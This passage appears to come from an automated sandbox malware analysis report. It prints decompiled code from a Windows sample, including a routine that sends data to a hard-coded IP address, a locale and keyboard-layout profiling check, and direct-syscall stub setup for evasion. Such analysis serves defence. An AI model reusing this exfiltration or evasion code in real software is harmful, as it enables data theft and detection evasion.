				_v8 =  *0x4080b4(_v12,  &_v28,  &_v92, 0x18, 5);
				LeaveCriticalSection(0x4084d4);
				if(_v8 >= 0) {
					_v20 = E004034F0(_v84 + 2);
					if(_v20 != 0) {
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						E0040355E( &_v28, 0, 8);
						EnterCriticalSection(0x4084d4);
						_t89 = 2;
						_t43 = (_t89 << 0) + 0x4084c0; // 0xf0006
						_t114 =  *0x4080b4; // 0xed0000
						 *(_t114 + 1) =  *_t43 & 0x0000ffff;
						_t94 =  *0x4080b4(_v12, 0, 0, 0,  &_v28, _v20, _v84,  &_v44, 0); // executed
						_v8 = _t94;
						LeaveCriticalSection(0x4084d4);
						if(_v8 >= 0) {
							 *_a8 = _v24;
						}
					}
				}
				EnterCriticalSection(0x4084d4);
				_t83 = 2;
				_t54 = (_t83 << 1) + 0x4084c0; // 0xf0006
				_t108 =  *0x4080b4; // 0xed0000
				 *(_t108 + 1) =  *_t54 & 0x0000ffff;
				 *0x4080b4(_v12); // executed
				LeaveCriticalSection(0x4084d4);
				goto L8;
			}





























                                                  0x0040418c
                                                  0x0040419e
                                                  0x00404393
                                                  0x00404399
                                                  0x00404399
                                                  0x004041ae
                                                  0x004041b1
                                                  0x004041b5
                                                  0x0040438b
                                                  0x0040438e
                                                  0x00000000
                                                  0x0040438e
                                                  0x004041c6
                                                  0x004041d4
                                                  0x004041d9
                                                  0x004041e4
                                                  0x004041ea
                                                  0x004041f1
                                                  0x004041f5
                                                  0x004041ff
                                                  0x00404202
                                                  0x00404206
                                                  0x0040420f
                                                  0x00404217
                                                  0x0040421b
                                                  0x00404222
                                                  0x00404228
                                                  0x0040424d
                                                  0x00404253
                                                  0x0040425b
                                                  0x00404265
                                                  0x00000000
                                                  0x00000000
                                                  0x00404272
                                                  0x0040427f
                                                  0x0040428a
                                                  0x00404292
                                                  0x00404296
                                                  0x0040429d
                                                  0x004042a3
                                                  0x004042bb
                                                  0x004042c3
                                                  0x004042cd
                                                  0x004042dd
                                                  0x004042e4
                                                  0x004042e6
                                                  0x004042e9
                                                  0x004042f5
                                                  0x00404300
                                                  0x00404308
                                                  0x0040430c
                                                  0x00404313
                                                  0x00404319
                                                  0x00404335
                                                  0x0040433b
                                                  0x00404343
                                                  0x0040434d
                                                  0x00404355
                                                  0x00404355
                                                  0x0040434d
                                                  0x004042e4
                                                  0x0040435c
                                                  0x00404364
                                                  0x00404367
                                                  0x0040436e
                                                  0x00404374
                                                  0x0040437a
                                                  0x00404385
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 0040402B: GetFileAttributesW.KERNELBASE(00F7E960,00401035,00F7E960), ref: 0040402C
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • EnterCriticalSection.KERNEL32(004084D4), ref: 0040420F
                                                  • LeaveCriticalSection.KERNEL32(004084D4), ref: 0040425B
                                                  • EnterCriticalSection.KERNEL32(004084D4), ref: 0040428A
                                                  • LeaveCriticalSection.KERNEL32(004084D4), ref: 004042C3
                                                  • EnterCriticalSection.KERNEL32(004084D4), ref: 00404300
                                                  • LeaveCriticalSection.KERNEL32(004084D4), ref: 00404343
                                                  • EnterCriticalSection.KERNEL32(004084D4), ref: 0040435C
                                                  • LeaveCriticalSection.KERNEL32(004084D4), ref: 00404385
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Heap$AllocateAttributesFileProcess
                                                  • String ID: @$\??\%s
                                                  • API String ID: 4065952465-3277924498
                                                  • Opcode ID: b4b8b1fcaaceb9357a8479c2bfe7e70250756f5cf0e697e41a6ab527b82701fd
                                                  • Instruction ID: 81f4aeba07127441b735290afecc171b038b89b4d282d6fbbf4a3dc81e75b50f
                                                  • Opcode Fuzzy Hash: b4b8b1fcaaceb9357a8479c2bfe7e70250756f5cf0e697e41a6ab527b82701fd
                                                  • Instruction Fuzzy Hash: CE518E71D40209AFEB04DF90DE4ABADBBB5FB44305F10813AFA41BA1D1DBB56A45CB48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405002 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 138networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 411 405002-40508b call 40439a 414 405094-4050ec 411->414 415 40508d-40508f 411->415 418 4051d0 414->418 419 4050f2-405120 call 404ff6 socket 414->419 416 4051d3-4051d6 415->416 418->416 422 4051c6-4051c9 419->422 423 405126-40513d call 404f64 call 40355e 419->423 422->418 428 40513e-405144 423->428 429 405146-40515b connect 428->429 430 4051b9-4051c2 closesocket 428->430 431 4051ac-4051b7 Sleep 429->431 432 40515d-40517d send 429->432 430->422 431->428 432->431 433 40517f-405199 send 432->433 433->431 434 40519b-4051aa call 40351e 433->434 434->430
                                                  C-Code - Quality: 82%
                                                  			E00405002(intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				intOrPtr _v12;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				char _v92;
				short _v94;
				char _v96;
				char _v496;
				signed char _t74;
				signed int _t77;
				short _t81;
				signed int _t84;
				signed int _t87;
				signed int _t93;
				signed int _t97;
				signed int _t101;
				signed int _t106;
				intOrPtr _t116;
				void* _t120;

				_v80 = 0xa0f5fc93;
				_v76 = 0x5e568bb;
				_v72 = 0x74cff91f;
				_v68 = 0xa7733acd;
				_v64 = 0x59d852ad;
				_v60 = 0xa5c6d777;
				_v56 = 0x377545a2;
				_v52 = 0x8e3398bc;
				_v48 = 0xed514704;
				_v44 = _v44 & 0x00000000;
				_v40 = 0x77;
				_v39 = 0x73;
				_v38 = 0x32;
				_v37 = 0x5f;
				_v36 = 0x33;
				_v35 = 0x32;
				_v34 = 0x2e;
				_v33 = 0x64;
				_v32 = 0x6c;
				_v31 = 0x6c;
				_v30 = 0;
				_t24 =  &_v40; // 0x77, executed
				_t74 = E0040439A(_t24,  &_v80); // executed
				if((_t74 & 0x000000ff) == 9) {
					_v5 = 0;
					_v28 = 0x38;
					_v27 = 0x39;
					_v26 = 0x2e;
					_v25 = 0x32;
					_v24 = 0x33;
					_v23 = 0x38;
					_v22 = 0x2e;
					_v21 = 0x31;
					_v20 = 0x37;
					_v19 = 0x30;
					_v18 = 0x2e;
					_v17 = 0x32;
					_v16 = 0x34;
					_v15 = 0x30;
					_v14 = 0;
					_push( &_v496);
					_push(0x202);
					_t77 = 4;
					if( *((intOrPtr*)(_t120 + _t77 * 0 - 0x4c))() != 0) {
						L13:
						return _v5;
					}
					_t81 = 2;
					_v96 = _t81;
					_v94 = E00404FF6(0x8b3);
					_t84 = 4;
					_v12 =  *((intOrPtr*)(_t120 + (_t84 << 0) - 0x4c))(_v96, 1, 0);
					if(_v12 == 0xffffffff) {
						L12:
						_t87 = 4;
						 *((intOrPtr*)(_t120 + _t87 * 7 - 0x4c))();
						goto L13;
					}
					_t52 =  &_v28; // 0x38
					E00404F64(_t52,  &_v92);
					_t53 =  &_v28; // 0x38
					E0040355E(_t53, 0, 0xf);
					while((_v5 & 0x000000ff) == 0) {
						_push(0x10);
						_push( &_v96);
						_push(_v12);
						_t97 = 4;
						if( *((intOrPtr*)(_t120 + (_t97 << 1) - 0x4c))() == 0xffffffff) {
							L10:
							Sleep(0x3e8);
							continue;
						}
						_push(0);
						_push( *0x408508 & 0x0000ffff);
						_push( *0x40850c);
						_push(_v12);
						_t101 = 4;
						if( *((intOrPtr*)(_t120 + _t101 * 3 - 0x4c))() == 0xffffffff) {
							goto L10;
						}
						_push(0);
						_push(_a8 + 1);
						_push(_a4);
						_push(_v12);
						_t106 = 4;
						if( *((intOrPtr*)(_t120 + _t106 * 3 - 0x4c))() == 0xffffffff) {
							goto L10;
						}
						_t116 =  *0x40850c; // 0xf6e780
						E0040351E(_t116);
						_v5 = 1;
						break;
					}
					_t93 = 4;
					 *((intOrPtr*)(_t120 + _t93 * 5 - 0x4c))(_v12);
					goto L12;
				}
				return 0;
			}
























































                                                  0x0040500b
                                                  0x00405012
                                                  0x00405019
                                                  0x00405020
                                                  0x00405027
                                                  0x0040502e
                                                  0x00405035
                                                  0x0040503c
                                                  0x00405043
                                                  0x0040504a
                                                  0x0040504e
                                                  0x00405052
                                                  0x00405056
                                                  0x0040505a
                                                  0x0040505e
                                                  0x00405062
                                                  0x00405066
                                                  0x0040506a
                                                  0x0040506e
                                                  0x00405072
                                                  0x00405076
                                                  0x0040507d
                                                  0x00405080
                                                  0x0040508b
                                                  0x00405094
                                                  0x00405098
                                                  0x0040509c
                                                  0x004050a0
                                                  0x004050a4
                                                  0x004050a8
                                                  0x004050ac
                                                  0x004050b0
                                                  0x004050b4
                                                  0x004050b8
                                                  0x004050bc
                                                  0x004050c0
                                                  0x004050c4
                                                  0x004050c8
                                                  0x004050cc
                                                  0x004050d0
                                                  0x004050da
                                                  0x004050db
                                                  0x004050e2
                                                  0x004050ec
                                                  0x004051d0
                                                  0x00000000
                                                  0x004051d0
                                                  0x004050f4
                                                  0x004050f5
                                                  0x00405102
                                                  0x00405111
                                                  0x00405119
                                                  0x00405120
                                                  0x004051c6
                                                  0x004051c8
                                                  0x004051cc
                                                  0x00000000
                                                  0x004051cc
                                                  0x00405129
                                                  0x0040512c
                                                  0x00405135
                                                  0x00405138
                                                  0x0040513e
                                                  0x00405146
                                                  0x0040514b
                                                  0x0040514c
                                                  0x00405151
                                                  0x0040515b
                                                  0x004051ac
                                                  0x004051b1
                                                  0x00000000
                                                  0x004051b1
                                                  0x0040515d
                                                  0x00405166
                                                  0x00405167
                                                  0x0040516d
                                                  0x00405172
                                                  0x0040517d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040517f
                                                  0x00405185
                                                  0x00405186
                                                  0x00405189
                                                  0x0040518e
                                                  0x00405199
                                                  0x00000000
                                                  0x00000000
                                                  0x0040519b
                                                  0x004051a1
                                                  0x004051a6
                                                  0x00000000
                                                  0x004051a6
                                                  0x004051be
                                                  0x004051c2
                                                  0x00000000
                                                  0x004051c2
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 0040439A: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,004044D8), ref: 004043AC
                                                    • Part of subcall function 0040439A: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,004044D8), ref: 004043B9
                                                  • socket.WS2_32(?,00000001,00000000), ref: 00405115
                                                  • connect.WS2_32(000000FF,?,00000010), ref: 00405154
                                                  • send.WS2_32(000000FF,00000000,00000000), ref: 00405176
                                                  • send.WS2_32(000000FF,000000FF,00000035,00000000), ref: 00405192
                                                  • closesocket.WS2_32(000000FF), ref: 004051C2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: send$HandleLibraryLoadModuleclosesocketconnectsocket
                                                  • String ID: 89.238.170.240$ws2_32.dll
                                                  • API String ID: 2279181061-3342816196
                                                  • Opcode ID: beae2c1e84d0aae0df8846cbd1db5151f5a7bd69fb3d4fa98ba23ecc8af200cf
                                                  • Instruction ID: e01ffa01383210f14aad19b10e0660efb7d8c6087f36a42e14391d519914f28c
                                                  • Opcode Fuzzy Hash: beae2c1e84d0aae0df8846cbd1db5151f5a7bd69fb3d4fa98ba23ecc8af200cf
                                                  • Instruction Fuzzy Hash: 4F51C730C44289EEEB01CBE8D8197EEBF789F15314F14419AE660BE2D1C7B9474ACB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401F03 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 84COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 531 401f03-401f74 GetUserDefaultUILanguage 532 401f7e-401f85 531->532 533 401f87-401f96 532->533 534 401f9d-401fd5 call 4035c3 * 2 GetKeyboardLayoutList 532->534 536 401f98 533->536 537 401f9b 533->537 542 401fd7-401fdb 534->542 543 402018-402029 call 4035c3 534->543 536->537 537->532 544 401fe5-401fec 542->544 544->543 546 401fee-402016 call 4035c3 544->546 546->544
                                                  C-Code - Quality: 24%
                                                  			E00401F03() {
				signed int _v5;
				signed int _v6;
				signed int _v12;
				signed char _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				struct HKL__* _v236;
				signed char _t65;
				void* _t75;
				void* _t76;
				void* _t77;

				_v36 = 0x419;
				_v34 = 0x422;
				_v32 = 0x423;
				_v30 = 0x42c;
				_v28 = 0x42b;
				_v26 = 0x43f;
				_v24 = 0x440;
				_v22 = 0x438;
				_v20 = 0x428;
				_v18 = 0x443;
				__imp__GetUserDefaultUILanguage(); // executed
				_v12 = 0x443;
				_v6 = 0;
				while((_v6 & 0x000000ff) < 0xa) {
					if(( *(_t75 + (_v6 & 0x000000ff) * 2 - 0x20) & 0x0000ffff) == (_v12 & 0x0000ffff)) {
						goto _v36;
					}
					_v6 = _v6 + 1;
				}
				E004035C3(__eflags, 0, "- SystemLayout %d\r\n", _v12 & 0x0000ffff);
				_t77 = _t76 + 0xc;
				_push("- KeyboardLayouts: ( ");
				_push(0);
				E004035C3(__eflags);
				_v16 = GetKeyboardLayoutList(0x32,  &_v236);
				__eflags = _v16;
				if(__eflags > 0) {
					_v5 = 0;
					while(1) {
						__eflags = (_v5 & 0x000000ff) - _v16;
						if(__eflags >= 0) {
							goto L11;
						}
						E004035C3(__eflags, 0, "{%d} ",  *(_t75 + (_v5 & 0x000000ff) * 4 - 0xe8) & 0x0000ffff);
						_t77 = _t77 + 0xc;
						 *(_t75 + (_v5 & 0x000000ff) * 4 - 0xe8) =  *(_t75 + (_v5 & 0x000000ff) * 4 - 0xe8) & 0x00000000;
						_t65 = _v5 + 1;
						__eflags = _t65;
						_v5 = _t65;
					}
				}
				L11:
				_push(" )\r\n");
				_push(0);
				return E004035C3(__eflags);
			}






















                                                  0x00401f11
                                                  0x00401f1a
                                                  0x00401f23
                                                  0x00401f2c
                                                  0x00401f35
                                                  0x00401f3e
                                                  0x00401f47
                                                  0x00401f50
                                                  0x00401f59
                                                  0x00401f62
                                                  0x00401f66
                                                  0x00401f6c
                                                  0x00401f70
                                                  0x00401f7e
                                                  0x00401f96
                                                  0x00401f98
                                                  0x00401f98
                                                  0x00401f7b
                                                  0x00401f7b
                                                  0x00401fa9
                                                  0x00401fae
                                                  0x00401fb1
                                                  0x00401fb6
                                                  0x00401fb8
                                                  0x00401fce
                                                  0x00401fd1
                                                  0x00401fd5
                                                  0x00401fd7
                                                  0x00401fe5
                                                  0x00401fe9
                                                  0x00401fec
                                                  0x00000000
                                                  0x00000000
                                                  0x00402002
                                                  0x00402007
                                                  0x0040200e
                                                  0x00401fe0
                                                  0x00401fe0
                                                  0x00401fe2
                                                  0x00401fe2
                                                  0x00401fe5
                                                  0x00402018
                                                  0x00402018
                                                  0x0040201d
                                                  0x00402029

                                                  APIs
                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 00401F66
                                                  • GetKeyboardLayoutList.USER32(00000032,?), ref: 00401FC8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: DefaultKeyboardLanguageLayoutListUser
                                                  • String ID: )$- KeyboardLayouts: ( $- SystemLayout %d${%d}
                                                  • API String ID: 167087913-619012376
                                                  • Opcode ID: f3efbf5d261d81c50e15a178c400749c002c505840b7dad8446bb3638f507242
                                                  • Instruction ID: 7c4dfc43665810f5058d3247ce6cdcd449f2bd336ab1effd38bbbbeb3a057cdb
                                                  • Opcode Fuzzy Hash: f3efbf5d261d81c50e15a178c400749c002c505840b7dad8446bb3638f507242
                                                  • Instruction Fuzzy Hash: 9731AF54D18298AAEB005FE494027FDBB70AF14305F1050ABF948F62D2D67D4B49D76E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404511 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 231memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 551 404511-404520 552 404856 551->552 553 404526-40453f VirtualAlloc 551->553 554 40485c-40485f 552->554 553->552 555 404545-404569 call 40439a 553->555 556 404862-404867 554->556 559 404852-404854 555->559 560 40456f-404584 call 403533 555->560 559->556 563 404586-40458d 560->563 564 404598-40459b 563->564 565 40458f-404594 563->565 566 40459f-4045c6 GetCurrentProcess IsWow64Process call 404ece 564->566 565->563 567 404596 565->567 570 404656-404659 566->570 571 4045cc-4045d1 566->571 567->566 572 4046a6-4046a9 570->572 573 40465b-40465e 570->573 574 4045f2-4045f7 571->574 575 4045d3-4045e3 571->575 579 404754-40475a 572->579 580 4046af-4046b4 572->580 576 404660-40467c 573->576 577 40467e-404682 573->577 581 404637-40463a 574->581 582 4045f9-4045fe 574->582 578 4045e5-4045ed 575->578 585 4046f8-404705 576->585 577->552 586 404688-4046a4 577->586 578->585 583 404760-404766 579->583 584 4047f5-4047f8 579->584 587 4046d6-4046d8 580->587 588 4046b6-4046d4 580->588 590 404645-404654 581->590 591 40463c-40463f 581->591 582->575 589 404600-404602 582->589 592 404786-40478c 583->592 593 404768-404781 583->593 584->552 594 4047fa-40481b 584->594 585->554 586->585 595 40470a-40470d 587->595 596 4046da-4046f3 587->596 588->585 589->575 597 404604-404607 589->597 590->578 591->552 591->590 598 4047ac-4047b2 592->598 599 40478e-4047a7 592->599 593->554 600 40483d 594->600 601 40481d-404823 594->601 604 40472d-404730 595->604 605 40470f-404728 595->605 596->585 602 404609-40461b 597->602 603 40461d-404620 597->603 606 4047d2-4047d8 598->606 607 4047b4-4047cd 598->607 599->554 611 404842-404849 600->611 601->600 608 404825-40482b 601->608 602->578 603->552 609 404626-404635 603->609 604->552 610 404736-40474f 604->610 605->554 606->594 612 4047da-4047f3 606->612 607->554 608->600 613 40482d-404833 608->613 609->578 610->554 611->554 612->554 613->600 614 404835-40483b 613->614 614->600 615 40484b-404850 614->615 615->611
                                                  C-Code - Quality: 75%
                                                  			E00404511(intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				short _v12;
				char _v16;
				void* _v20;
				char _v24;
				signed int _t23;
				void* _t25;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				signed char _t40;
				intOrPtr _t42;
				short _t43;
				short _t45;
				short _t46;
				short _t48;
				short _t50;
				short _t52;
				short _t53;
				short _t54;
				short _t55;
				short _t56;
				short _t61;
				void* _t62;

				if( *0x4080b4 != 0) {
					L56:
					_t23 =  *0x4084c0; // 0x55
					L57:
					return _t23 & 0xffffff00 | _t23 != 0x00000000;
				}
				_t25 = VirtualAlloc(0, 0x20, 0x3000, 0x40); // executed
				 *0x4080b4 = _t25;
				if(_t25 == 0) {
					goto L56;
				}
				_v16 = 0x6c64746e;
				_t3 =  &_v16; // 0x6c64746e
				_v12 = 0x6c;
				_v24 = 0xd09c750;
				_v20 = 0;
				if(E0040439A(_t3,  &_v24) != 1) {
					return 0;
				}
				_t62 =  *0x4080b4; // 0xed0000
				E00403533(_t62, _v24, 0x1e);
				_t40 = 0;
				while( *((char*)(_t62 + (_t40 & 0x000000ff))) != 0xc2) {
					_t40 = _t40 + 1;
					if(_t40 < 0x20) {
						continue;
					}
					L8:
					_v8 = 0;
					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
					E00404ECE( &_v8, 1);
					_t34 = _a8;
					if(_v8 != 1) {
						if(_t34 != 5) {
							if(_t34 != 6) {
								_t42 = _a16;
								if(_t34 != 0xa) {
									if(_t34 != 0xb) {
										goto L56;
									}
									L47:
									 *0x4084c0 = 0x8e0178;
									 *0x4084c6 = 0xbc;
									_t23 = 0x178;
									if(_t42 == 0x3fab || _t42 == 0x42ee || _t42 == 0x4563 || _t42 == 0x47ba || _t42 == 0x47bb) {
										_t43 = 0x18d;
									} else {
										_t43 = 0x18e;
									}
									 *0x4084c4 = _t43;
									goto L57;
								}
								if(_t42 != 0x2800) {
									if(_t42 != 0x295a) {
										if(_t42 != 0x3839) {
											if(_t42 != 0x3ad7) {
												goto L47;
											}
											_t23 = 0x175;
											 *0x4084c0 = 0x8d0175;
											 *0x4084c4 = 0xbb018a;
											goto L57;
										}
										_t23 = 0x172;
										 *0x4084c0 = 0x8d0172;
										 *0x4084c4 = 0xba0185;
										goto L57;
									}
									_t23 = 0x170;
									 *0x4084c0 = 0x8c0170;
									 *0x4084c4 = 0xb80183;
									goto L57;
								}
								_t23 = 0x16e;
								 *0x4084c0 = 0x8c016e;
								 *0x4084c4 = 0xb80180;
								goto L57;
							}
							_t35 = _a12;
							if(_t35 != 0) {
								if(_t35 != 1) {
									if(_t35 != 2) {
										if(_t35 != 3) {
											goto L56;
										}
										_t23 = 0x168;
										 *0x4084c0 = 0x8a0168;
										 *0x4084c4 = 0xb60179;
										goto L57;
									}
									_t23 = 0x163;
									 *0x4084c0 = 0x870163;
									 *0x4084c4 = 0xb30174;
									goto L57;
								}
								_t23 = 0x42;
								 *0x4084c2 = 0x111;
								_t45 = 0x32;
								 *0x4084c4 = _t45;
								_t46 = 0xe7;
								L32:
								 *0x4084c0 = _t23;
								 *0x4084c6 = _t46;
								goto L57;
							}
							_t23 = 0x3c;
							 *0x4084c2 = 0x102;
							_t48 = 0x30;
							 *0x4084c4 = _t48;
							_t46 = 0xe1;
							goto L32;
						}
						if(_a12 != 1) {
							if(_a12 != 2) {
								goto L56;
							}
							_t23 = 0x27;
							 *0x4084c2 = 0xbf;
							_t50 = 0x1b;
							 *0x4084c4 = _t50;
							_t18 = _t23 + 0x77; // 0x9e
							_t46 = _t18;
							goto L32;
						}
						_t23 = 0x25;
						 *0x4084c2 = 0xb7;
						_t52 = 0x19;
						 *0x4084c4 = _t52;
						_t46 = _t52 + 0x7e;
						goto L32;
					}
					_t53 = 5;
					if(_t34 != _t53) {
						_t61 = 6;
						if(_t34 != _t61) {
							if(_t34 == 0xa || _t34 == 0xb) {
								_t23 = 0x55;
								_t54 = 0xf;
								 *0x4084c2 = _t61;
								_push(0x11);
								L11:
								 *0x4084c4 = _t54;
								_pop(_t46);
								goto L32;
							} else {
								goto L56;
							}
						}
						_t36 = _a12;
						if(_t36 == 0 || _t36 == 1) {
							goto L10;
						} else {
							if(_t36 != 2) {
								if(_t36 != 3) {
									goto L56;
								}
								_t23 = 0x54;
								 *0x4084c2 = _t53;
								_t54 = 0xe;
								_push(0x10);
								goto L11;
							}
							_t23 = 0x53;
							_t56 = 4;
							 *0x4084c2 = _t56;
							_t54 = 0xd;
							_push(0xf);
							goto L11;
						}
					}
					L10:
					_t23 = 0x52;
					_t55 = 3;
					 *0x4084c2 = _t55;
					_t54 = 0xc;
					_push(0xe);
					goto L11;
				}
				 *((char*)(_t62 + (_t40 & 0x000000ff))) = 0xc3;
				goto L8;
			}



























                                                  0x00404520
                                                  0x00404856
                                                  0x00404856
                                                  0x0040485c
                                                  0x00000000
                                                  0x0040485f
                                                  0x00404532
                                                  0x00404538
                                                  0x0040453f
                                                  0x00000000
                                                  0x00000000
                                                  0x00404548
                                                  0x0040454f
                                                  0x00404552
                                                  0x00404558
                                                  0x0040455f
                                                  0x00404569
                                                  0x00000000
                                                  0x00404852
                                                  0x0040456f
                                                  0x0040457c
                                                  0x00404584
                                                  0x00404586
                                                  0x0040458f
                                                  0x00404594
                                                  0x00000000
                                                  0x00000000
                                                  0x0040459f
                                                  0x004045a2
                                                  0x004045ad
                                                  0x004045bb
                                                  0x004045c0
                                                  0x004045c6
                                                  0x00404659
                                                  0x004046a9
                                                  0x00404754
                                                  0x0040475a
                                                  0x004047f8
                                                  0x00000000
                                                  0x00000000
                                                  0x004047fa
                                                  0x004047fa
                                                  0x00404809
                                                  0x00404810
                                                  0x0040481b
                                                  0x0040483d
                                                  0x0040484b
                                                  0x0040484b
                                                  0x0040484b
                                                  0x00404842
                                                  0x00000000
                                                  0x00404842
                                                  0x00404766
                                                  0x0040478c
                                                  0x004047b2
                                                  0x004047d8
                                                  0x00000000
                                                  0x00000000
                                                  0x004047da
                                                  0x004047df
                                                  0x004047e9
                                                  0x00000000
                                                  0x004047e9
                                                  0x004047b4
                                                  0x004047b9
                                                  0x004047c3
                                                  0x00000000
                                                  0x004047c3
                                                  0x0040478e
                                                  0x00404793
                                                  0x0040479d
                                                  0x00000000
                                                  0x0040479d
                                                  0x00404768
                                                  0x0040476d
                                                  0x00404777
                                                  0x00000000
                                                  0x00404777
                                                  0x004046af
                                                  0x004046b4
                                                  0x004046d8
                                                  0x0040470d
                                                  0x00404730
                                                  0x00000000
                                                  0x00000000
                                                  0x00404736
                                                  0x0040473b
                                                  0x00404745
                                                  0x00000000
                                                  0x00404745
                                                  0x0040470f
                                                  0x00404714
                                                  0x0040471e
                                                  0x00000000
                                                  0x0040471e
                                                  0x004046dc
                                                  0x004046e2
                                                  0x004046eb
                                                  0x004046ec
                                                  0x004046f3
                                                  0x004046f8
                                                  0x004046f8
                                                  0x004046fe
                                                  0x00000000
                                                  0x004046fe
                                                  0x004046b8
                                                  0x004046be
                                                  0x004046c7
                                                  0x004046c8
                                                  0x004046cf
                                                  0x00000000
                                                  0x004046cf
                                                  0x0040465e
                                                  0x00404682
                                                  0x00000000
                                                  0x00000000
                                                  0x0040468a
                                                  0x00404690
                                                  0x00404699
                                                  0x0040469a
                                                  0x004046a1
                                                  0x004046a1
                                                  0x00000000
                                                  0x004046a1
                                                  0x00404662
                                                  0x00404668
                                                  0x00404671
                                                  0x00404672
                                                  0x00404679
                                                  0x00000000
                                                  0x00404679
                                                  0x004045ce
                                                  0x004045d1
                                                  0x004045f4
                                                  0x004045f7
                                                  0x0040463a
                                                  0x00404647
                                                  0x0040464a
                                                  0x0040464b
                                                  0x00404652
                                                  0x004045e5
                                                  0x004045e5
                                                  0x004045ec
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040463a
                                                  0x004045f9
                                                  0x004045fe
                                                  0x00000000
                                                  0x00404604
                                                  0x00404607
                                                  0x00404620
                                                  0x00000000
                                                  0x00000000
                                                  0x00404628
                                                  0x0040462b
                                                  0x00404632
                                                  0x00404633
                                                  0x00000000
                                                  0x00404633
                                                  0x0040460b
                                                  0x0040460e
                                                  0x00404611
                                                  0x00404618
                                                  0x00404619
                                                  0x00000000
                                                  0x00404619
                                                  0x004045fe
                                                  0x004045d3
                                                  0x004045d5
                                                  0x004045d8
                                                  0x004045db
                                                  0x004045e2
                                                  0x004045e3
                                                  0x00000000
                                                  0x004045e3
                                                  0x0040459b
                                                  0x00000000

                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,004022B7), ref: 00404532
                                                    • Part of subcall function 0040439A: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,004044D8), ref: 004043AC
                                                    • Part of subcall function 0040439A: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,004044D8), ref: 004043B9
                                                  • GetCurrentProcess.KERNEL32(004022B7), ref: 004045A6
                                                  • IsWow64Process.KERNEL32(00000000), ref: 004045AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: Process$AllocCurrentHandleLibraryLoadModuleVirtualWow64
                                                  • String ID: l$ntdl
                                                  • API String ID: 1207166019-924918826
                                                  • Opcode ID: 11c04c657aee3ca3113d695794a80b48e7e56eb1af845e21d89bbdb6a6985c97
                                                  • Instruction ID: d089819bd469ed1c6df92899057766de468798ce60c5d806d11cdafc58a6e4c0
                                                  • Opcode Fuzzy Hash: 11c04c657aee3ca3113d695794a80b48e7e56eb1af845e21d89bbdb6a6985c97
